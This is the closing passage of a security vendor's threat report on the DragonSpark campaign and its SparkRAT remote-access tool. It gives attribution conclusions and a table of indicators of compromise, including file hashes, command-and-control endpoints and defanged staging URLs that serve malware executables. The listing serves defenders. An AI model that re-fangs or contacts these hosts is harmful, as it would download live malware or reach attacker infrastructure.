Finally, the malware staging infrastructure is located exclusively in East Asia (Taiwan, Hong Kong, China, and Singapore), behavior which is common amongst Chinese-speaking threat actors targeting victims in the region. This evidence is consistent with our assessment that the DragonSpark attacks are highly likely orchestrated by a Chinese-speaking threat actor.

Conclusions

Chinese-speaking threat actors are known to frequently use open source software in malicious campaigns. The little-known SparkRAT that we observed in the DragonSpark attacks is among the newest additions to the toolset of these actors.

Since SparkRAT is a multi-platform and feature-rich tool, and is regularly updated with new features, we estimate that the RAT will remain attractive to cybercriminals and other threat actors in the future.

In addition, threat actors will almost certainly continue exploring techniques and specifics of execution environments for evading detection and obfuscating malware, such as the Golang source code interpretation we document in this article.

SentinelLabs continues to monitor the DragonSpark cluster of activities and hopes that defenders will leverage the findings presented in this article to bolster their defenses.

Indicators of Compromise

Description Indicator
ShellCode_Loader (a PyInstaller package) 83130d95220bc2ede8645ea1ca4ce9afc4593196
m6699.exe 14ebbed449ccedac3610618b5265ff803243313d
SparkRAT 2578efc12941ff481172dd4603b536a3bd322691
C2 server network endpoint for ShellCode_Loader 103.96.74[.]148:8899
C2 server network endpoint for SparkRAT 103.96.74[.]148:6688
C2 server network endpoint for m6699.exe 103.96.74[.]148:6699
C2 server IP address for China Chopper 104.233.163[.]190
Staging URL for ShellCode_Loader hxxp://211.149.237[.]108:801/py.exe
Staging URL for m6699.exe hxxp://211.149.237[.]108:801/m6699.exe
Staging URL for SparkRAT hxxp://43.129.227[.]159:81/c.exe
Staging URL for GotoHTTP hxxp://13.213.41[.]125:9001/go.exe
Staging URL for ShellCode_Loader hxxp://www.bingoplanet[.]com[.]tw/images/py.exe
Staging URL for ShellCode_Loader hxxps://www.moongallery.com[.]tw/upload/py.exe
Staging URL for ShellCode_Loader hxxp://www.holybaby.com[.]tw/api/ms.exe

โŒ
โŒ